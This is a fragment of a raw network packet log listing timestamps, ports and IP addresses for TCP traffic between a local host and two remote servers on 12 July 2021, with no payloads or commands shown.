Jul 12, 2021 10:29:48.026390076 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.026424885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.026431084 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.026456118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.026482105 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.026489019 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.026511908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.026532888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.026542902 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.027106047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.027148962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.027168989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.027190924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.027220964 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.027255058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.027278900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.027292013 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.027313948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.027343035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.027350903 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.027374983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.027400017 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.027410030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.028244972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.028278112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.028309107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.028335094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.028369904 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.028402090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.028436899 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.028460026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.028482914 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.028507948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.028532982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.028543949 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.028568029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.028595924 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.028965950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.029089928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.029114008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.029125929 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.029207945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.029231071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.029239893 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.029443026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.029478073 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.029490948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.029602051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.029633045 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.029675007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.029891014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.029926062 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.030003071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.030082941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.030114889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.030134916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.030216932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.030242920 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.030256033 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.030333996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.030359983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.030374050 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.030396938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.030425072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.030431032 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.030448914 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.031068087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.031104088 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.031143904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.031168938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.031183004 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.031204939 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.031219959 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.031244993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.031310081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.031341076 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.031410933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.031435013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.031460047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.031488895 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.031835079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.031877041 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.031980038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.032007933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.032020092 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.032044888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.032074928 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.032099009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.032164097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.032309055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.032392025 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.032399893 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.032432079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.032458067 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.032481909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.032731056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.032766104 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.032835960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.032915115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.032957077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.032963991 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.032984972 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.032999039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.033041954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.033092022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.033114910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.033195972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.033216953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.033226967 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.033432007 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.033806086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.033833027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.033907890 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.033968925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.033993959 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.034024000 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.034071922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.034094095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.034115076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.034231901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.034261942 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.034497023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.034519911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.034543037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.034570932 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.034600019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.034629107 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.034652948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.034676075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.034765005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.034790039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.034868002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.034893036 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.034907103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.034945011 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.035095930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.035491943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.035557032 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.035593987 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.035619974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.035643101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.035654068 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.035680056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.035706997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.035712957 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.035809040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.035832882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.035844088 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.035957098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.035988092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.035995007 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.036019087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.036046982 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.036292076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.036452055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.036478996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.036550999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.036559105 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.036585093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.036633015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.036655903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.036681890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.036711931 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.036720991 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.036746025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.036771059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.036777020 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.036801100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.036829948 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.036860943 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.037359953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.037389040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.037538052 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.037575960 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.037617922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.037692070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.037714958 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.037731886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.037755013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.037777901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.037802935 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.037812948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.037837029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.037859917 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.037870884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.037894964 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.038271904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.038364887 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.038460970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.038486958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.038526058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.038556099 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.038644075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.038796902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.038821936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.038834095 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.038860083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.038892984 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.038918972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.039038897 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.039174080 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.039199114 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.039221048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.039246082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.039268970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.039282084 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.039307117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.039335012 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.039436102 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.039593935 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.039618015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.039644003 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.039681911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.039743900 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.039752007 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.039819956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.039843082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.039866924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.039891005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.039906979 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.039978981 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.040113926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.040141106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.040163040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.040231943 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.040844917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.040878057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.040925026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.040955067 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.040981054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.041013002 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.110979080 CEST	443	49757	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:48.114999056 CEST	443	49757	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:48.115041018 CEST	443	49757	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:48.115061045 CEST	443	49757	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:48.115763903 CEST	443	49757	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:48.115788937 CEST	443	49757	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:48.115942955 CEST	49757	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:48.116803885 CEST	49757	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:48.117026091 CEST	49757	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:48.284101963 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.291810036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.292525053 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.343554020 CEST	443	49757	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:48.343693018 CEST	49757	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:48.870181084 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.893562078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.893609047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.893635035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.893661976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.893692970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.893729925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.893739939 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.893774033 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.893790960 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.893814087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.893840075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.893867016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.893877983 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.893903971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.893929958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.893954992 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.893970013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.894042015 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.894169092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.894256115 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.894292116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.894319057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.894387007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.894447088 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.894483089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.894512892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.894541025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.894553900 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.894579887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.894609928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.894617081 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.894634962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.894656897 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.894917965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.894951105 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.894984007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.894992113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.895019054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.895042896 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.895061970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.895090103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.895112038 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.895159960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.895185947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.895235062 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.895263910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.895292044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.895319939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.895344019 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.895375013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.895392895 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.895412922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.895482063 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.895755053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.895937920 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.895992994 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.896011114 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896039963 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896066904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896094084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896117926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896143913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896157980 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.896186113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896203041 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.896226883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896280050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896287918 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.896315098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896359921 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.896394014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896787882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896822929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896848917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896883011 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896893978 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.896910906 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.896935940 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896967888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.896996021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.897022009 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.897034883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.897063971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.897074938 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.897100925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.897116899 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.897139072 CEST	80	49755	47.254.186.176	192.168.2.3
